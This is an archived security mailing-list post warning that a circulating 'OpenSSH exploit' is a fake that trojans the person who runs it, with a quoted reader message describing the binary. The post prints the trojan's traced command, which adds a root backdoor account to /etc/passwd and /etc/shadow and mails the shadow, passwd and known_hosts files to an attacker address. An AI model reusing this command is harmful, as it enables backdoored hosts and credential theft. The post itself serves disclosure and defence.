lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: dotslash at snosoft.com (KF) Subject: new openssh exploit in the wild! * is FAKE AS SH@!* printf("[*] sending shellcode\n")= 22 popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp; find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp | /usr/sbin/sendmail -f ownage@....de m0nkeyhack@...ermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") = 0x0804a6b0 -KF gordon last wrote: > hi readers, > while i was staying idle in an so called 0day release channel on one irc > network some scriptkiddies were > talking about an new 0day release. > > in my backlog i can see the following: > ---cut > 08:09 [R4lph] *** r3t0r (r4lph@xxx) has joined channel #0dayz > 08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/ > ---cut > > i looked at this piece of exploit... it is binary so i'am not sure if > this is a trojan or a backdoor or a virus. but i can't see anything > strange while sniffing the exploit traffic. and i got root on serveral > of my openbsd boxes with that. the bruteforcer seems to be very good. > > i too looked at "strings theosshucksass" and found nothing suspicious. > > this exploit seems to be in the wild (underground) since beginning of > august. > > thats quite a long time i hope most admins are patching the systems > now... because the exploit is getting round faster and faster. > > if anyone can reverse engineer this piece it would be great if he posts > his resulsts on his list because iam really intressted on the exploiting > technique used for that bug. > > i cant get an idea on how to exploit this. > > hmm... > regards, > glast > > ------------------------------------------------------------------------ > Ab sofort auch im Ortsbereich einfach die 0-10-13 vorw?hlen. Infos unter > www.tele2.de ? <http://www.tele2.de>
Powered by blists - more mailing lists